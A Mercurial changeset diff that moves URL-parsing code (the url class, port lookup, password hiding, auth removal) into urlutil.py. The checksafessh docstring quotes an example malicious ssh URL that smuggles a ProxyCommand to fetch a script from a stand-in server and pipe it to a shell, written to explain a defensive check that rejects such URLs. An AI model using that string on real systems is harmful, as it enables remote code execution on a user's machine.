mercurial/utils/urlutil.py
changeset 46907 ffd3e823a7e5
parent 46906 33524c46a092
child 46908 4452cb788404
--- a/mercurial/utils/urlutil.py	Sun Apr 11 23:54:35 2021 +0200
+++ b/mercurial/utils/urlutil.py	Mon Apr 12 03:01:04 2021 +0200
@@ -5,6 +5,8 @@
 # This software may be used and distributed according to the terms of the
 # GNU General Public License version 2 or any later version.
 import os
+import re as remod
+import socket
 
 from ..i18n import _
 from ..pycompat import (
@@ -12,12 +14,437 @@
     setattr,
 )
 from .. import (
+    encoding,
     error,
     pycompat,
-    util,
+    urllibcompat,
 )
 
 
+if pycompat.TYPE_CHECKING:
+    from typing import (
+        Union,
+    )
+
+urlreq = urllibcompat.urlreq
+
+
+def getport(port):
+    # type: (Union[bytes, int]) -> int
+    """Return the port for a given network service.
+
+    If port is an integer, it's returned as is. If it's a string, it's
+    looked up using socket.getservbyname(). If there's no matching
+    service, error.Abort is raised.
+    """
+    try:
+        return int(port)
+    except ValueError:
+        pass
+
+    try:
+        return socket.getservbyname(pycompat.sysstr(port))
+    except socket.error:
+        raise error.Abort(
+            _(b"no port number associated with service '%s'") % port
+        )
+
+
+class url(object):
+    r"""Reliable URL parser.
+
+    This parses URLs and provides attributes for the following
+    components:
+
+    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
+
+    Missing components are set to None. The only exception is
+    fragment, which is set to '' if present but empty.
+
+    If parsefragment is False, fragment is included in query. If
+    parsequery is False, query is included in path. If both are
+    False, both fragment and query are included in path.
+
+    See http://www.ietf.org/rfc/rfc2396.txt for more information.
+
+    Note that for backward compatibility reasons, bundle URLs do not
+    take host names. That means 'bundle://../' has a path of '../'.
+
+    Examples:
+
+    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
+    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
+    >>> url(b'ssh://[::1]:2200//home/joe/repo')
+    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
+    >>> url(b'file:///home/joe/repo')
+    <url scheme: 'file', path: '/home/joe/repo'>
+    >>> url(b'file:///c:/temp/foo/')
+    <url scheme: 'file', path: 'c:/temp/foo/'>
+    >>> url(b'bundle:foo')
+    <url scheme: 'bundle', path: 'foo'>
+    >>> url(b'bundle://../foo')
+    <url scheme: 'bundle', path: '../foo'>
+    >>> url(br'c:\foo\bar')
+    <url path: 'c:\\foo\\bar'>
+    >>> url(br'\\blah\blah\blah')
+    <url path: '\\\\blah\\blah\\blah'>
+    >>> url(br'\\blah\blah\blah#baz')
+    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
+    >>> url(br'file:///C:\users\me')
+    <url scheme: 'file', path: 'C:\\users\\me'>
+
+    Authentication credentials:
+
+    >>> url(b'ssh://joe:xyz@x/repo')
+    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
+    >>> url(b'ssh://joe@x/repo')
+    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
+
+    Query strings and fragments:
+
+    >>> url(b'http://host/a?b#c')
+    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
+    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
+    <url scheme: 'http', host: 'host', path: 'a?b#c'>
+
+    Empty path:
+
+    >>> url(b'')
+    <url path: ''>
+    >>> url(b'#a')
+    <url path: '', fragment: 'a'>
+    >>> url(b'http://host/')
+    <url scheme: 'http', host: 'host', path: ''>
+    >>> url(b'http://host/#a')
+    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
+
+    Only scheme:
+
+    >>> url(b'http:')
+    <url scheme: 'http'>
+    """
+
+    _safechars = b"!~*'()+"
+    _safepchars = b"/!~*'()+:\\"
+    _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
+
+    def __init__(self, path, parsequery=True, parsefragment=True):
+        # type: (bytes, bool, bool) -> None
+        # We slowly chomp away at path until we have only the path left
+        self.scheme = self.user = self.passwd = self.host = None
+        self.port = self.path = self.query = self.fragment = None
+        self._localpath = True
+        self._hostport = b''
+        self._origpath = path
+
+        if parsefragment and b'#' in path:
+            path, self.fragment = path.split(b'#', 1)
+
+        # special case for Windows drive letters and UNC paths
+        if hasdriveletter(path) or path.startswith(b'\\\\'):
+            self.path = path
+            return
+
+        # For compatibility reasons, we can't handle bundle paths as
+        # normal URLS
+        if path.startswith(b'bundle:'):
+            self.scheme = b'bundle'
+            path = path[7:]
+            if path.startswith(b'//'):
+                path = path[2:]
+            self.path = path
+            return
+
+        if self._matchscheme(path):
+            parts = path.split(b':', 1)
+            if parts[0]:
+                self.scheme, path = parts
+                self._localpath = False
+
+        if not path:
+            path = None
+            if self._localpath:
+                self.path = b''
+                return
+        else:
+            if self._localpath:
+                self.path = path
+                return
+
+            if parsequery and b'?' in path:
+                path, self.query = path.split(b'?', 1)
+                if not path:
+                    path = None
+                if not self.query:
+                    self.query = None
+
+            # // is required to specify a host/authority
+            if path and path.startswith(b'//'):
+                parts = path[2:].split(b'/', 1)
+                if len(parts) > 1:
+                    self.host, path = parts
+                else:
+                    self.host = parts[0]
+                    path = None
+                if not self.host:
+                    self.host = None
+                    # path of file:///d is /d
+                    # path of file:///d:/ is d:/, not /d:/
+                    if path and not hasdriveletter(path):
+                        path = b'/' + path
+
+            if self.host and b'@' in self.host:
+                self.user, self.host = self.host.rsplit(b'@', 1)
+                if b':' in self.user:
+                    self.user, self.passwd = self.user.split(b':', 1)
+                if not self.host:
+                    self.host = None
+
+            # Don't split on colons in IPv6 addresses without ports
+            if (
+                self.host
+                and b':' in self.host
+                and not (
+                    self.host.startswith(b'[') and self.host.endswith(b']')
+                )
+            ):
+                self._hostport = self.host
+                self.host, self.port = self.host.rsplit(b':', 1)
+                if not self.host:
+                    self.host = None
+
+            if (
+                self.host
+                and self.scheme == b'file'
+                and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
+            ):
+                raise error.Abort(
+                    _(b'file:// URLs can only refer to localhost')
+                )
+
+        self.path = path
+
+        # leave the query string escaped
+        for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
+            v = getattr(self, a)
+            if v is not None:
+                setattr(self, a, urlreq.unquote(v))
+
+    def copy(self):
+        u = url(b'temporary useless value')
+        u.path = self.path
+        u.scheme = self.scheme
+        u.user = self.user
+        u.passwd = self.passwd
+        u.host = self.host
+        u.path = self.path
+        u.query = self.query
+        u.fragment = self.fragment
+        u._localpath = self._localpath
+        u._hostport = self._hostport
+        u._origpath = self._origpath
+        return u
+
+    @encoding.strmethod
+    def __repr__(self):
+        attrs = []
+        for a in (
+            b'scheme',
+            b'user',
+            b'passwd',
+            b'host',
+            b'port',
+            b'path',
+            b'query',
+            b'fragment',
+        ):
+            v = getattr(self, a)
+            if v is not None:
+                attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
+        return b'<url %s>' % b', '.join(attrs)
+
+    def __bytes__(self):
+        r"""Join the URL's components back into a URL string.
+
+        Examples:
+
+        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
+        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
+        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
+        'http://user:pw@host:80/?foo=bar&baz=42'
+        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
+        'http://user:pw@host:80/?foo=bar%3dbaz'
+        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
+        'ssh://user:pw@[::1]:2200//home/joe#'
+        >>> bytes(url(b'http://localhost:80//'))
+        'http://localhost:80//'
+        >>> bytes(url(b'http://localhost:80/'))
+        'http://localhost:80/'
+        >>> bytes(url(b'http://localhost:80'))
+        'http://localhost:80/'
+        >>> bytes(url(b'bundle:foo'))
+        'bundle:foo'
+        >>> bytes(url(b'bundle://../foo'))
+        'bundle:../foo'
+        >>> bytes(url(b'path'))
+        'path'
+        >>> bytes(url(b'file:///tmp/foo/bar'))
+        'file:///tmp/foo/bar'
+        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
+        'file:///c:/tmp/foo/bar'
+        >>> print(url(br'bundle:foo\bar'))
+        bundle:foo\bar
+        >>> print(url(br'file:///D:\data\hg'))
+        file:///D:\data\hg
+        """
+        if self._localpath:
+            s = self.path
+            if self.scheme == b'bundle':
+                s = b'bundle:' + s
+            if self.fragment:
+                s += b'#' + self.fragment
+            return s
+
+        s = self.scheme + b':'
+        if self.user or self.passwd or self.host:
+            s += b'//'
+        elif self.scheme and (
+            not self.path
+            or self.path.startswith(b'/')
+            or hasdriveletter(self.path)
+        ):
+            s += b'//'
+            if hasdriveletter(self.path):
+                s += b'/'
+        if self.user:
+            s += urlreq.quote(self.user, safe=self._safechars)
+        if self.passwd:
+            s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
+        if self.user or self.passwd:
+            s += b'@'
+        if self.host:
+            if not (self.host.startswith(b'[') and self.host.endswith(b']')):
+                s += urlreq.quote(self.host)
+            else:
+                s += self.host
+        if self.port:
+            s += b':' + urlreq.quote(self.port)
+        if self.host:
+            s += b'/'
+        if self.path:
+            # TODO: similar to the query string, we should not unescape the
+            # path when we store it, the path might contain '%2f' = '/',
+            # which we should *not* escape.
+            s += urlreq.quote(self.path, safe=self._safepchars)
+        if self.query:
+            # we store the query in escaped form.
+            s += b'?' + self.query
+        if self.fragment is not None:
+            s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
+        return s
+
+    __str__ = encoding.strmethod(__bytes__)
+
+    def authinfo(self):
+        user, passwd = self.user, self.passwd
+        try:
+            self.user, self.passwd = None, None
+            s = bytes(self)
+        finally:
+            self.user, self.passwd = user, passwd
+        if not self.user:
+            return (s, None)
+        # authinfo[1] is passed to urllib2 password manager, and its
+        # URIs must not contain credentials. The host is passed in the
+        # URIs list because Python < 2.4.3 uses only that to search for
+        # a password.
+        return (s, (None, (s, self.host), self.user, self.passwd or b''))
+
+    def isabs(self):
+        if self.scheme and self.scheme != b'file':
+            return True  # remote URL
+        if hasdriveletter(self.path):
+            return True  # absolute for our purposes - can't be joined()
+        if self.path.startswith(br'\\'):
+            return True  # Windows UNC path
+        if self.path.startswith(b'/'):
+            return True  # POSIX-style
+        return False
+
+    def localpath(self):
+        # type: () -> bytes
+        if self.scheme == b'file' or self.scheme == b'bundle':
+            path = self.path or b'/'
+            # For Windows, we need to promote hosts containing drive
+            # letters to paths with drive letters.
+            if hasdriveletter(self._hostport):
+                path = self._hostport + b'/' + self.path
+            elif (
+                self.host is not None and self.path and not hasdriveletter(path)
+            ):
+                path = b'/' + path
+            return path
+        return self._origpath
+
+    def islocal(self):
+        '''whether localpath will return something that posixfile can open'''
+        return (
+            not self.scheme
+            or self.scheme == b'file'
+            or self.scheme == b'bundle'
+        )
+
+
+def hasscheme(path):
+    # type: (bytes) -> bool
+    return bool(url(path).scheme)  # cast to help pytype
+
+
+def hasdriveletter(path):
+    # type: (bytes) -> bool
+    return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
+
+
+def urllocalpath(path):
+    # type: (bytes) -> bytes
+    return url(path, parsequery=False, parsefragment=False).localpath()
+
+
+def checksafessh(path):
+    # type: (bytes) -> None
+    """check if a path / url is a potentially unsafe ssh exploit (SEC)
+
+    This is a sanity check for ssh urls. ssh will parse the first item as
+    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
+    Let's prevent these potentially exploited urls entirely and warn the
+    user.
+
+    Raises an error.Abort when the url is unsafe.
+    """
+    path = urlreq.unquote(path)
+    if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
+        raise error.Abort(
+            _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
+        )
+
+
+def hidepassword(u):
+    # type: (bytes) -> bytes
+    '''hide user credential in a url string'''
+    u = url(u)
+    if u.passwd:
+        u.passwd = b'***'
+    return bytes(u)
+
+
+def removeauth(u):
+    # type: (bytes) -> bytes
+    '''remove all authentication information from a url string'''
+    u = url(u)
+    u.user = u.passwd = None
+    return bytes(u)
+
+
 class paths(dict):
     """Represents a collection of paths and their configs.
 
@@ -103,7 +530,7 @@
 
 @pathsuboption(b'pushurl', b'pushloc')
 def pushurlpathoption(ui, path, value):
-    u = util.url(value)
+    u = url(value)
     # Actually require a URL.
     if not u.scheme:
         ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
@@ -148,7 +575,7 @@
             raise ValueError(b'rawloc must be defined')
 
         # Locations may define branches via syntax <base>#<branch>.
-        u = util.url(rawloc)
+        u = url(rawloc)
         branch = None
         if u.fragment:
             branch = u.fragment